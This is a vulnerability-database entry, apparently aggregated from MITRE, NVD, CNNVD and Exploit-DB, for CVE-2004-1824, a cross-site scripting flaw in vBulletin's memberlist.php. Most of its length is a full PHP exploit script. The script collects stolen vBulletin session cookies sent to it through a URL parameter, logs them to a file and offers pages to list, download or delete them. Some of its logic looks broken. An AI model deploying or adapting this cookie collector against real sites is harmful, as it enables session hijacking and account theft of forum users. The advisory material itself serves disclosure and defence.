CVE-2004-1824
CVSS 4.3
Published: 2004-12-31 00:00:00
Last modified: 2016-10-17 23:01:06

[Original] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin before 3.0 allows remote attackers to inject arbitrary web script or HTML via the what parameter to memberlist.php.


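[CNNVD] JelSoft VBulletin MemberList.PHP Cross-Site Scripting (XSS) Vulnerability (CNNVD-200412-813)

        Jelsoft vBulletin versions before 3.0 contain a cross-site scripting (XSS) vulnerability. Remote attackers can inject arbitrary web script or HTML via the what parameter to memberlist.php.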

- CVSS (base score)

CVSS score: 4.3 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

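- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found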

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1824
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1824
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-813
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2002-11/0276.html
(UNKNOWN)  BUGTRAQ  20021121 XSS bug in vBulletin
http://marc.info/?l=bugtraq&m=107945556112453&w=2
(UNKNOWN)  BUGTRAQ  20040316 JelSoft vBulletin Multiple XSS Vulnerabilities
http://securitytracker.com/id?1009440
(UNKNOWN)  SECTRACK  1009440
http://www.iss.net/security_center/static/10679.php
(UNKNOWN)  XF  vbulletin-memberlist-xss(10679)
http://www.securityfocus.com/bid/6226
(UNKNOWN)  BID  6226
http://www.securityfocus.com/bid/9887
(UNKNOWN)  BID  9887
http://xforce.iss.net/xforce/xfdb/15495
(UNKNOWN)  XF  vbulletin-showthread-xss(15495)

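- Vulnerability information

JelSoft VBulletin MemberList.PHP Cross-Site Scripting (XSS) Vulnerability
Medium severity  Cross-site scripting
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        Jelsoft vBulletin versions before 3.0 contain a cross-site scripting (XSS) vulnerability. Remote attackers can inject arbitrary web script or HTML via the what parameter to memberlist.php.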

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (22030)

VBulletin 2.0/2.2.x Memberlist.PHP Cross Site Scripting Vulnerability (EDBID:22030)
php webapps
2002-11-22 Verified
0 Sp.IC
N/A
source: http://www.securityfocus.com/bid/6226/info

vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.

As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.

<?PHP
      // vBulletin XSS Injection Vulnerability: Exploit
      // ---
      // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
      // Description: Fetching vBulletin's cookies and storing it into a log file.

      // Variables:

      $LogFile = "Cookies.Log";

      // Functions:
      /*
      If ($HTTP_GET_VARS['Action'] = "Log") {
          $Header = "<!--";
          $Footer = "--->";
      }
      Else {

           $Header = "";
           $Footer = "";
      }
      Print ($Header);
      */
      Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
      Print ("<Pre>");
      Print ("<Center>");
      Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
      Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
      /*
      Print ($Footer);
      */

      Switch ($HTTP_GET_VARS['Action']) {
          Case "Log":

                 $Data = $HTTP_GET_VARS['Cookie'];
                 $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
                 $Log = FOpen ($LogFile, "a+");
                         FWrite ($Log, Trim ($Data) . "\n");
                         FClose ($Log);
                         Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
          Break;
                Case "List":
                 If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                     Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
                     Exit ();
                 }
                 Else {
                     Print ("</Center></Pre>");
                     $Records = Array_UniQue (File ($LogFile));
                                  Print ("<Pre>");
                                  Print ("<B>.:: Statics</B>\n");
                     Print ("\n");
                                  Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
                     Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
                     Print ("\n");

                     Print ("<B>.:: Options</B>\n");
                     Print ("\n");

                     If (Count (File ($LogFile)) > 0) {
                         $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
                     }
                     Else{
                         $Link['Download'] = "[No Records in Log]";
                     }

                     Print ("o Download Log : " . $Link['Download'] . "\n");
                     Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH . "?Action=Delete\">Y</A>]\n");
                     Print ("\n");
                     Print ("<B>.:: Records</B>\n");
                     Print ("\n");

                     While (List ($Line[0], $Line[1]) = Each ($Records)) {
                         Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                     }
                 }

                 Print ("</Pre>");
          Break;
          Case "Delete":
              @UnLink ($LogFile);
              Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
              Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
          Break;
      }
    ?>		

- Vulnerability information

4312
vBulletin memberlist.php what Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

vBulletin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "what" variable upon submission to the "memberlist.php" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- Timeline

2004-03-15 Unknown
2004-03-15 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

 

 
